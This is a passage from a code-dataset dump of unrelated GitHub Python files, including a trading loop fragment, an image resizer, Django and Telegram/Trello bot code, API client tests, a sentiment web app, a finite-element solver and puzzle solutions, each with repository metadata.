testlist[test].checkTradingChance()\n\n print(\"------------------ one cycle is completed @ \",str(datetime.fromtimestamp(time.time())), \"--------------\")\n\n end_time = time.time()\n\n # calculate how much time should be waiting for\n time_diff = end_time - begin_time\n print(\"Time usage in last round:\", time_diff)\n # wait for the next candle cyclic\n time.sleep(300-time_diff)\n\n# begin_time = time.time()\n# end_time = time.time()\n\n# while True:\n# begin_time = time.time()\n# print(begin_time)\n# for i in range(100000):\n# a = 1+i\n# end_time = time.time()\n# time.sleep(2-(end_time-begin_time))\n# # time.sleep(2)\n \n# if end_time == begin_time:\n# print(\"What the fuck!\")\n# else:\n# print(round(end_time-begin_time,20))\n# print(end_time-begin_time)\n# print(end_time)\n \n","repo_name":"cibobo/Baerlauch","sub_path":"Baerlauch.py","file_name":"Baerlauch.py","file_ext":"py","file_size_in_byte":12206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11735871373","text":"import os\nimport glob\nfrom PIL import Image\n\ndef resize_images(input_folder, output_folder_suffix=\"_resized\", size=(500, 500)):\n \"\"\"\n Resizes all images in the input_folder to the specified size and saves them in a new folder with a suffix.\n \n :param input_folder: str, the path to the folder containing the images to be resized\n :param output_folder_suffix: str, the suffix to add to the input folder name to create the output folder\n :param size: tuple, the target size for the resized images 
(width, height)\n \"\"\"\n # Create the output folder if it doesn't exist\n output_folder = os.path.join(os.path.dirname(input_folder), os.path.basename(input_folder) + output_folder_suffix)\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n # List all image files in the input folder\n input_folder = os.path.join(input_folder, \"*\")\n image_files = glob.glob(input_folder)\n\n # Iterate through the image files\n for image_file in image_files:\n # Open the image using Pillow\n with Image.open(image_file) as img:\n # Resize the image\n resized_img = img.resize(size)\n\n # Create the output file path\n file_name = os.path.basename(image_file)\n output_file = os.path.join(output_folder, file_name)\n\n # Save the resized image\n resized_img.save(output_file)\n\nif __name__ == \"__main__\":\n input_folder = \"images-different-sizes\"\n target_size = (500, 500)\n\n resize_images(input_folder, size=target_size)\n","repo_name":"piyushon2411/resize-images-bunker","sub_path":"resizeimages.py","file_name":"resizeimages.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6507372096","text":"import csv\nimport os\n\nimport resultsbot\nfrom django.core.management.base import BaseCommand\nfrom elections.models import Election\n\n\nclass Command(BaseCommand):\n def handle(self, **options):\n \"\"\"\n Stores possible modgov urls stored in CSV file against the related election objects\n \"\"\"\n\n # remove existing values first as this allows us to remove bad urls from the csv file\n Election.objects.update(modgov_url=None)\n\n path = os.path.join(\n os.path.dirname(resultsbot.__file__), \"election_id_to_url.csv\"\n )\n with open(path) as f:\n csv_file = csv.reader(f)\n for line in csv_file:\n try:\n election = Election.objects.get(slug=line[0])\n election.modgov_url = line[1]\n election.save()\n except (IndexError, Election.DoesNotExist):\n continue\n","repo_name":"DemocracyClub/yournextrepresentative","sub_path":"ynr/apps/resultsbot/management/commands/store_modgov_urls.py","file_name":"store_modgov_urls.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"675782899","text":"from unittest import mock\n\nfrom pytest_httpx import HTTPXMock\n\nfrom tpulse.sync_client import PostClient, PulseClient, UserClient, ua\n\nclient = PulseClient()\nargs = \"?appName=invest&origin=web&platform=web\"\n\nheaders = {\n \"Content-type\": \"application/json\",\n \"Accept\": \"application/json\",\n \"User-agent\": ua,\n}\n\n\ndef test_ua():\n assert type(ua) == str\n assert len(ua) > 1\n\n\ndef test_init_user():\n user = UserClient()\n assert user._client.headers[\"Content-type\"] == \"application/json\"\n assert user._client.headers[\"Accept\"] == \"application/json\"\n assert user._client.headers[\"User-agent\"] == ua\n\n\ndef test_init_post():\n post = PostClient()\n assert post._client.headers[\"Content-type\"] == \"application/json\"\n assert post._client.headers[\"Accept\"] == \"application/json\"\n assert post._client.headers[\"User-agent\"] == ua\n\n\ndef test_get_user_info(httpx_mock: HTTPXMock):\n expected = {\n \"id\": \"08efcec6\",\n \"type\": \"personal\",\n \"nickname\": \"finvestpaper\",\n \"status\": \"open\",\n \"image\": \"df91ef92\",\n \"block\": False,\n \"description\": \"description\",\n \"followersCount\": 73,\n \"followingCount\": 11,\n \"isLead\": False,\n \"serviceTags\": 
[],\n \"statistics\": {\n \"totalAmountRange\": {\"lower\": 1000000, \"upper\": 3000000},\n \"yearRelativeYield\": 500.00,\n \"monthOperationsCount\": 97,\n },\n \"subscriptionDomains\": None,\n \"popularHashtags\": [],\n \"donationActive\": True,\n \"isVisible\": True,\n \"baseTariffCategory\": \"unauthorized\",\n \"strategies\": [],\n }\n httpx_mock.add_response(\n method=\"GET\",\n headers=headers,\n url=f\"{UserClient.BASE_URL}profile/nickname/finvestpaper{args}\",\n json={\"status\": \"Ok\", \"payload\": expected},\n )\n actual = client.get_user_info(\"finvestpaper\")\n assert actual == expected\n\n\ndef test_get_posts_by_user_id(httpx_mock: HTTPXMock):\n expected = {\n \"nextCursor\": 171318,\n \"hasNext\": False,\n \"items\": [\n {},\n ],\n }\n httpx_mock.add_response(\n method=\"GET\",\n headers=headers,\n url=f\"{UserClient.BASE_URL}post/instrument/AAPL{args}&limit=30&cursor=999999999\",\n json={\"status\": \"Ok\", \"payload\": expected},\n )\n actual = client.get_posts_by_ticker(\"AAPL\")\n assert actual == expected\n\n\ndef test_get_posts_by_ticker(httpx_mock: HTTPXMock):\n expected = {\n \"nextCursor\": 4757390,\n \"hasNext\": True,\n \"items\": [],\n }\n httpx_mock.add_response(\n method=\"GET\",\n headers=headers,\n url=f\"{UserClient.BASE_URL}profile/08efcec6/post{args}&limit=30&cursor=999999999\",\n json={\"status\": \"Ok\", \"payload\": expected},\n )\n actual = client.get_posts_by_user_id(\"08efcec6\")\n assert actual == expected\n\n\n@mock.patch(\"tpulse.sync_client.UserClient\", autospec=True)\n@mock.patch(\"tpulse.sync_client.PostClient\", autospec=True)\ndef test_context_manager(mock_user, mock_post):\n with PulseClient() as cli:\n cli.test()\n mock_user.return_value.close.assert_called_once()\n mock_post.return_value.close.assert_called_once()\n","repo_name":"meanother/tpulse-py","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"24279890057","text":"#note to self, for running on my Desktop I have to use pyenv to install python 3.7.0 and then install strealit v 0.62.0\n#otherwise I get some junk about \"illegal hardware instruction\"\nimport streamlit as st\nimport pickle\n\nfrom science import classify\nimport sys\n#idk what it is about the import system, but it never seems to just work\nsys.path.append(\"./science\")\nfrom helpers import token_lemma\n\nloaded_model = pickle.load(open(\"./science/model.pkl\", 'rb'))\nloaded_vectorizer = pickle.load(open(\"./science/vectorizer.pkl\", 'rb'))\n\n\nmodel = classify.sentimenter(loaded_model, loaded_vectorizer)\n\nst.title('An online sentiment classifier')\n\nst.write(\"Enter text, up to 140 characters, that you'd like to know the sentiment of.\")\nst.write(\"Sorry, emojis will be ignored 😭\")\n\n\nsentence = st.text_area('Input your text here:', \"Data science is great!\")\nmaxlen = 140\nif len(sentence) > maxlen:\n st.error(f\"Input too long by {len(sentence) - maxlen} characters, please try again.\")\nelse:\n result = model.get_probs(sentence)\n \n st.success(f\"There's a {result[0]*100:.2f}% chance this is negative and a {result[1]*100:.2f}% chance it's positive.\")\n","repo_name":"nkvaltine/onlineSentiment","sub_path":"onlineSentiment.py","file_name":"onlineSentiment.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74745065424","text":"# James Elgy - 
04/05/2023\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport multiprocessing\nimport tqdm\nfrom ngsolve import *\nfrom ..Core_MPT.Theta0 import *\nfrom ..Core_MPT.imap_execution import *\nfrom warnings import warn\n\ndef Solve_Theta_0_Problem(Additional_Int_Order, CPUs, Maxsteps, Order, Solver, Tolerance, alpha, epsi, inout, mesh, mu_inv,\n recoverymode, sweepname):\n \"\"\"\n James Elgy - 2023\n Function to call and run the theta0 solver for MPT calculator. Note that this is intended as a general function,\n thus options such as recoverymode and sweepname may not be relevant in all cases and can be set to False.\n\n recoverymode now raises an error if Theta0.npy is not found. This is to avoid mistakenly calculating Theta0 for\n an incorrect set of parameters and improve user safety.\n\n Parameters\n ----------\n Additional_Int_Order: int bonus integration order added to linear and bilinear forms.\n CPUs: number of cpus assigned to the problem. 1 runs through in sequential mode.\n Maxsteps: int max steps assigned to the CGSolver.\n Order: int order of basis functions assigned in fes.\n Solver: str for preconditioner name, e.g. 'bddc'\n Tolerance: float solver tolerance\n alpha: float object scaling alpha\n epsi: float numeric regularisation constant\n inout: CoefficientFunction 1 inside object 0 outside.\n mesh: NGsolve mesh for the object\n mu: CoefficientFunction with relative permeabilty assigned to each region\n recoverymode: bool for if theta0 can be loaded from disk rather than recalculated. Used in POD modes.\n sweepname: str for the folder path used in recoverymode.\n\n Returns\n -------\n Theta0Sol,\n Theta0i,\n Theta0j,\n fes,\n ndof,\n evec\n \"\"\"\n\n # Setup the finite element space\n dom_nrs_metal = [0 if mat == \"air\" else 1 for mat in mesh.GetMaterials()]\n fes = HCurl(mesh, order=Order, dirichlet=\"outer\", gradientdomains=dom_nrs_metal)\n # fes = HCurl(mesh, order=Order, dirichlet=\"outer\", flags = { \"nograds\" : True })\n # Count the number of degrees of freedom\n ndof = fes.ndof\n # Define the vectors for the right hand side\n evec = [CoefficientFunction((1, 0, 0)), CoefficientFunction((0, 1, 0)), CoefficientFunction((0, 0, 1))]\n # Setup the grid functions and array which will be used to save\n Theta0i = GridFunction(fes)\n Theta0j = GridFunction(fes)\n Theta0Sol = np.zeros([ndof, 3])\n\n if CPUs > 1:\n if recoverymode is False:\n # Setup the inputs for the functions to run\n Theta0CPUs = min(3, multiprocessing.cpu_count(), CPUs)\n Runlist = []\n for i in range(3):\n if Theta0CPUs < 3:\n NewInput = (\n fes, Order, alpha, mu_inv, inout, evec[i], Tolerance, Maxsteps, epsi, i + 1, Solver, Additional_Int_Order, 'Theta0')\n else:\n NewInput = (fes, Order, alpha, mu_inv, inout, evec[i], Tolerance, Maxsteps, epsi, \"No Print\", Solver,\n Additional_Int_Order, 'Theta0')\n Runlist.append(NewInput)\n # Run on the multiple cores\n with multiprocessing.get_context(\"spawn\").Pool(Theta0CPUs) as pool:\n Output = list(tqdm.tqdm(pool.map(imap_version, Runlist), total=len(Runlist), desc='Solving Theta0'))\n\n print(' solved theta0 problems ')\n\n # Unpack the outputs\n for i, Direction in enumerate(Output):\n Theta0Sol[:, i] = Direction\n else:\n Theta0Sol = np.load('Results/' + sweepname + '/Data/Theta0.npy')\n\n else:\n if recoverymode is False:\n # Run in three directions and save in an array for later\n for i in tqdm.tqdm(range(3), desc='Solving Theta0'):\n Theta0Sol[:, i] = Theta0(fes, Order, alpha, mu_inv, inout, evec[i], Tolerance, Maxsteps, epsi, i + 1,\n 
Solver, Additional_Int_Order)\n print(' solved theta0 problems ')\n else:\n Theta0Sol = np.load('Results/' + sweepname + '/Data/Theta0.npy')\n\n\n return Theta0Sol, Theta0i, Theta0j, fes, ndof, evec\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"MPT-Calculator/MPT-Calculator","sub_path":"Functions/Core_MPT/Solve_Theta_0_Problem.py","file_name":"Solve_Theta_0_Problem.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69820901905","text":"from datetime import timedelta\n\nimport trolly\nfrom django.utils import timezone\nfrom telebot.types import Message\n\nfrom base import utils as base_utils\nfrom base.utils import mytime\nfrom bot import utils as bot_utils, keyboards\nfrom bot.handlers import tgbot\nfrom bot.models import TgUser, Token, Timer\nfrom bot.utils import TrelloClient\n\n\nclass PrivateHandler(bot_utils.BaseHandler):\n @staticmethod\n @tgbot.message_handler(TgUser.is_private, commands=keyboards.Start.commands())\n def start(tguser: TgUser):\n parts = tguser.message.text.split()\n if len(parts) == 2:\n # noinspection PyBroadException\n try:\n s = base_utils.real_urlsafe_b64decode(parts[1].encode()).decode()\n if s.startswith('token:'):\n p = s.split(':')\n if len(p) == 2:\n token_id = p[1]\n t = Token.objects.filter(id=token_id, created_at__gt=timezone.now() - timedelta(days=1)).first()\n if t:\n token = t.token\n t.delete()\n tguser.authorize(token)\n return tguser.render_to_string('bot/private/authorized.html', keyboard=keyboards.Start)\n except Exception:\n pass\n if not tguser.is_authorized():\n PrivateHandler.unauthorized(tguser)\n else:\n PrivateHandler.boards(tguser)\n\n @classmethod\n def unauthorized(cls, tguser: TgUser):\n assert isinstance(tguser.client, TrelloClient)\n url = tguser.client.get_authorisation_url()\n tguser.render_to_string('bot/private/errors/not_authorized.html', context=dict(url=url), edit=True)\n\n @staticmethod\n @tgbot.message_handler(TgUser.is_private, TgUser.is_authorized, regexp=keyboards.Boards.emoji_to_regexp())\n @tgbot.message_handler(TgUser.is_private, TgUser.is_authorized, commands=keyboards.Boards.commands())\n def boards(tguser: TgUser):\n assert isinstance(tguser.client, TrelloClient)\n boards = tguser.client.get_boards()\n timer_board_ids = tguser.timer_set.values_list('board_id', flat=True)\n tguser.render_to_string('bot/private/choose_board.html', keyboard=keyboards.Boards(tguser, boards, timer_board_ids), edit=True)\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/board ')\n def board(tguser: TgUser, board_id=None):\n if board_id is None:\n board_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n board = tguser.client.get_board(board_id)\n assert isinstance(board, trolly.Board)\n lists = board.get_lists()\n timer_list_ids = tguser.timer_set.values_list('list_id', flat=True)\n tguser.render_to_string('bot/private/choose_list.html', keyboard=keyboards.Lists(tguser, lists, timer_list_ids), edit=True)\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/board_list ')\n def board_list(tguser: TgUser, list_id=None):\n if list_id is None:\n list_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n board_list = tguser.client.get_list(list_id)\n assert isinstance(board_list, trolly.List)\n cards = board_list.get_cards()\n timer_card_ids = tguser.timer_set.values_list('card_id', 
flat=True)\n tguser.render_to_string('bot/private/choose_card.html', keyboard=keyboards.Cards(tguser, list_id, cards, timer_card_ids), edit=True)\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/card ')\n def card(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n card_info = card.get_card_information()\n timer = tguser.timer_set.filter(card_id=card_id).first()\n message = tguser.render_to_string('bot/private/show_card.html', context=dict(card=card_info), keyboard=keyboards.Card(tguser, card_id, timer), edit=True)\n if timer:\n assert isinstance(message, Message)\n timer.message_id = message.message_id\n timer.save()\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer_start ')\n def timer_start(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if timer:\n tguser.answer_callback_query('Timer was already started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_already_started')\n if tguser.timer_set.exists():\n tguser.answer_callback_query('You cannot start more than one timer simultaneously', show_alert=True)\n raise bot_utils.StateErrorHandler('multiple_timers')\n card_info = card.get_card_information()\n timer = tguser.timer_set.create(\n board_id=card_info['idBoard'],\n list_id=card_info['idList'],\n card_id=card_id,\n message_id=tguser.callback_query.message.message_id,\n )\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, timer))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer ')\n def timer(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if not timer:\n tguser.answer_callback_query('Timer was not started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_not_started')\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, timer))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer_stop ')\n def timer_stop(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if not timer:\n tguser.answer_callback_query('Timer was not started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_not_started')\n assert isinstance(timer, Timer)\n dur = timezone.now() - timer.created_at\n d = '%.2f' % (dur.seconds / 3600)\n card.add_comments('plus! 
%s/%s' % (d, d))\n timer.delete()\n logged = mytime(dur, True)\n tguser.answer_callback_query('Logged %s' % logged)\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, None))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer_reset ')\n def timer_reset(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if not timer:\n tguser.answer_callback_query('Timer was not started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_not_started')\n timer.delete()\n tguser.answer_callback_query('Timer was reset!')\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, None))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer_plus ')\n def timer_plus(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n minutes = tguser.callback_query_data_get(2, as_int=True)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if not timer:\n tguser.answer_callback_query('Timer was not started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_not_started')\n assert isinstance(timer, Timer)\n timer.created_at = timer.created_at - timedelta(minutes=minutes)\n timer.save()\n tguser.answer_callback_query('Timer was increased on %s minutes' % minutes)\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, timer))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/back ')\n def back(tguser: TgUser):\n obj_type = tguser.callback_query_data_get(1)\n obj_id = tguser.callback_query_data_get(2)\n assert isinstance(tguser.client, TrelloClient)\n if obj_type == 'card':\n card = tguser.client.get_card(obj_id)\n assert isinstance(card, trolly.Card)\n card_info = card.get_card_information()\n return PrivateHandler.board_list(tguser, card_info['idList'])\n if obj_type == 'list':\n board_list = tguser.client.get_list(obj_id)\n assert isinstance(board_list, trolly.List)\n board = board_list.get_board()\n return PrivateHandler.board(tguser, board.id)\n PrivateHandler.boards(tguser)\n\n @staticmethod\n @tgbot.message_handler(TgUser.is_private, regexp=keyboards.Help.emoji_to_regexp())\n @tgbot.message_handler(TgUser.is_private, commands=keyboards.Help.commands() + ['sos'])\n def help(tguser: TgUser):\n tguser.render_to_string('bot/private/help.html', keyboard=keyboards.Start)\n\n @staticmethod\n @tgbot.message_handler(TgUser.is_private, commands=['settings'])\n def settings(tguser: TgUser):\n tguser.send_message('Настроек пока нет', keyboard=keyboards.Start)\n","repo_name":"ihoru/trelloplusbot","sub_path":"bot/handlers/private_chat.py","file_name":"private_chat.py","file_ext":"py","file_size_in_byte":10215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36860430945","text":"import argparse\nimport torch\nimport torch.utils.data as data\nimport os\nimport numpy as np\nimport tqdm\nimport math\nimport scipy.io.wavfile as wavfile\nfrom slsyn_net import slsyn_net\nimport cv2 as cv\n\nclass dataset(data.Dataset):\n def __init__(self,\n mix_lst_path,\n audio_direc,\n visual_direc,\n batch_size=1,\n partition='test',\n 
sampling_rate=16000):\n\n self.mixture_direc = audio_direc\n self.visual_direc = visual_direc\n self.sampling_rate = sampling_rate\n\n self.mix_lst=open(mix_lst_path).read().splitlines()\n # self.mix_lst=list(filter(lambda x: x.split(',')[0]==partition, self.mix_lst))\n\n def __getitem__(self, index):\n line = self.mix_lst[index]\n embedding_save_path=line.split(',')[0]+'/'+ line.replace(',','_').replace('/', '_')\n\n mixture_path=self.mixture_direc+line.split(',')[0]+'/'+ line.replace(',','_').replace('/', '_') +'.wav'\n _, mixture = wavfile.read(mixture_path)\n mixture = self._audio_norm(mixture)\n \n min_length = mixture.shape[0]\n\n line=line.split(',')\n\n c = 0 # The first speaker in the mixture list is the target speaker\n # read video\n length = math.floor(min_length/self.sampling_rate*25)\n\n roiSize = 112\n visual_path=self.visual_direc+line[c*4+1]+'/'+line[c*4+2]+'/'+line[c*4+3]+'.mp4'\n captureObj = cv.VideoCapture(visual_path)\n roiSequence = []\n while (captureObj.isOpened()):\n ret, frame = captureObj.read()\n if ret == True:\n grayed = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n grayed = cv.resize(grayed, (roiSize*2,roiSize*2))\n roi = grayed[int(roiSize-(roiSize/2)):int(roiSize+(roiSize/2)), int(roiSize-(roiSize/2)):int(roiSize+(roiSize/2))]\n roiSequence.append(roi)\n else:\n break\n captureObj.release()\n visual = np.asarray(roiSequence)/255.0\n visual = (visual[:length] - 0.4161)/0.1688\n\n if visual.shape[0] < length:\n visual = np.pad(visual, ((0,int(length - visual.shape[0])),(0,0),(0,0)), mode = 'edge')\n\n return mixture, visual, (embedding_save_path)\n\n def __len__(self):\n return len(self.mix_lst)\n\n def _audio_norm(self,audio):\n return np.divide(audio, np.max(np.abs(audio)))\n\ndef main(args):\n # Model\n model = slsyn_net()\n model = model.cuda()\n pretrained_model = torch.load('slsyn_model_dict.pt', map_location='cpu')['model']\n\n state = model.state_dict()\n for key in state.keys():\n pretrain_key = 'module.' 
+ key\n if pretrain_key in pretrained_model.keys():\n state[key] = pretrained_model[pretrain_key]\n else:\n print(\"not %s loaded\" % pretrain_key)\n model.load_state_dict(state)\n\n\n\n datasets = dataset(\n mix_lst_path=args.mix_lst_path,\n audio_direc=args.audio_direc,\n visual_direc=args.visual_direc)\n\n test_generator = data.DataLoader(datasets,\n batch_size = 1,\n shuffle = False,\n num_workers = 1)\n\n \n model.eval()\n with torch.no_grad():\n for i, (a_mix, v_tgt, fname) in enumerate(tqdm.tqdm(test_generator)):\n a_mix = a_mix.cuda().float()\n v_tgt = v_tgt.cuda().float()\n\n out = model(a_mix, v_tgt)\n\n out = out.squeeze(0).cpu().numpy().T\n # print(out.shape)\n\n save_path = \"/home/panzexu/datasets/voxceleb2/visual_embedding/sync/sync_av/\" + fname[0] +'.npy'\n\n if not os.path.exists(save_path.rsplit('/', 1)[0]):\n os.makedirs(save_path.rsplit('/', 1)[0])\n np.save(save_path, out)\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"SLSyn network extract embedding\")\n \n # Dataloader\n parser.add_argument('--mix_lst_path', type=str, default='/home/panzexu/datasets/voxceleb2/audio_mixture/2_mix_min_800/mixture_data_list_2mix.csv',\n help='directory including train data')\n parser.add_argument('--visual_direc', type=str, default='/home/panzexu/datasets/voxceleb2/orig/',\n help='directory including test data')\n parser.add_argument('--audio_direc', type=str, default='/home/panzexu/datasets/voxceleb2/audio_mixture/2_mix_min_800/',\n help='directory of audio')\n args = parser.parse_args()\n\n main(args)","repo_name":"zexupan/reentry","sub_path":"pretrained_slsyn/slsyn_extract_embedding.py","file_name":"slsyn_extract_embedding.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"74747787664","text":"#!/usr/bin/env python\n\nclass SplitDateStr():\n\n def __init__(self, datestr):\n\n self.datestr = datestr\n self.a = ' '\n\n def datelist(self):\n for i in self.datestr:\n if i == '-':\n i = \" \"\n\n self.a += i\n\n splite_date= self.a.split()\n\n date_list = [ int(i) for i in splite_date ]\n\n return date_list\n\n# Test\nc='2023-02-14'\nTest = SplitDateStr(c)\nprint(Test.datelist())\n","repo_name":"daveads/discord-profile-bot","sub_path":"core/splitdate.py","file_name":"splitdate.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25872195141","text":"import sys\ninput = sys.stdin.readline\nn,m,r = map(int, input().split())\ndata = [ list(map(int,input().split())) for _ in range(n)]\ntemp =[ [0 for _ in range(m)] for i in range(n)]\n#회전하는 함수 \ndef rotate():\n for i in range(min(n,m)//2): #줄별로 회전시킴\n # 좌측 최하단의 점을 빼준다. 예제(4,1) 점을 빼주는 형식\n pick = data[n-1-i][i]\n # 우측 최하단에서부터 회전하는 방향을 역으로 한다고 생각\n # (4,1)<-(3,1)<-(2,1) 을 차례 채워준다고 생각하면 된다. 
\n for j in range(n-1-i-1,i-1,-1):\n data[j+1][i] = data[j][i] \n \n # 제일 윗줄\n for j in range(i+1,m-i):\n data[i][j-1] = data[i][j]\n # 제일 오른쪽 줄 \n for j in range(i+1,n-i):\n data[j-1][m-i-1] = data[j][m-i-1]\n # 제일 아랫줄\n for j in range(m-2-i,i,-1):\n data[n-1-i][j+1] = data[n-1-i][j]\n data[n-1-i][i+1] = pick\n#r번 회전\nfor k in range(r): \n rotate()\n#결과 출력 \n\n#결과 출력 \nfor i in data:\n for j in i:\n print(j, end=' ')\n print('')\n","repo_name":"gkgg123/TIL_new","sub_path":"알��리즘/백준/16926_배열_돌리기_1_version1.py","file_name":"16926_배열_돌리기_1_version1.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43744027963","text":"from NetworkTrainer import NetworkTrainer\r\nfrom tensorflow.keras import models, layers\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\nclass SusyCrossSectionPredictor(NetworkTrainer):\r\n def __init__(self, train_file: str, test_file: str, target: str = '',\r\n standardised: bool = False, normalised: bool = False):\r\n super().__init__(train_file, test_file, target,\r\n standardised, normalised)\r\n\r\n def train(self, method: str):\r\n if method == 'seq':\r\n model = models.Sequential()\r\n model.add(layers.Dense(64, 'relu',\r\n input_shape=(len(self.attributes),))\r\n )\r\n model.add(layers.Dense(64, 'relu'))\r\n model.add(layers.Dense(64, 'relu'))\r\n model.add(layers.Dense(1, 'relu'))\r\n model.compile(optimizer='adam', loss='MSE',\r\n metrics=['accuracy', 'MAE', 'MAPE'])\r\n\r\n return self._train_model(model)\r\n else:\r\n raise Exception(\"No proper training method provided.\")\r\n\r\n def _train_model(self, training_model):\r\n # Define for readability:\r\n t, att = self.target, self.attributes\r\n v_data = (self.val_data[att], self.val_data[t])\r\n\r\n history = training_model.fit(self.train_data[att],\r\n self.train_data[t],\r\n epochs=2,\r\n validation_data=v_data)\r\n\r\n prediction = training_model.predict(self.val_data[att])\r\n acc = accuracy_score(self.val_data[t], prediction)\r\n\r\n print(acc)\r\n\r\n return training_model\r\n","repo_name":"GroenteLepel/ML_ParticleAndAstrophysics","sub_path":"SusyCrossSectionPredictor.py","file_name":"SusyCrossSectionPredictor.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15722174305","text":"import re\nimport sys\nfrom collections import defaultdict\n\n\ndef main():\n if len(sys.argv) > 1:\n filename = sys.argv[1]\n else:\n filename = \"input.txt\"\n with open(filename) as f:\n input_text = f.read().strip()\n print(f\"Answer: {calculate(input_text)}\")\n\n\ndef calculate(input_text):\n given = get_re(input_text)\n memory = defaultdict(int)\n for mask in given:\n for mem, val in given[mask]:\n memory[mem] = maskate(mask, val)\n return sum(memory.values())\n\n\ndef maskate(mask, val):\n or_mask = int(mask.replace(\"X\", \"0\"), base=2)\n and_mask = int(mask.replace(\"X\", \"1\"), base=2)\n val = val & and_mask\n val = val | or_mask\n return val\n\n\ndef get_re(s):\n given = defaultdict(list)\n r_mem = re.compile(r\"(\\d+)\")\n for line in s.split(\"\\n\"):\n if line.startswith(\"mask\"):\n curr_mask = line[7:]\n else:\n vals = r_mem.findall(line)\n given[curr_mask].append((int(vals[0]), int(vals[1])))\n return given\n\n\nif __name__ == \"__main__\":\n 
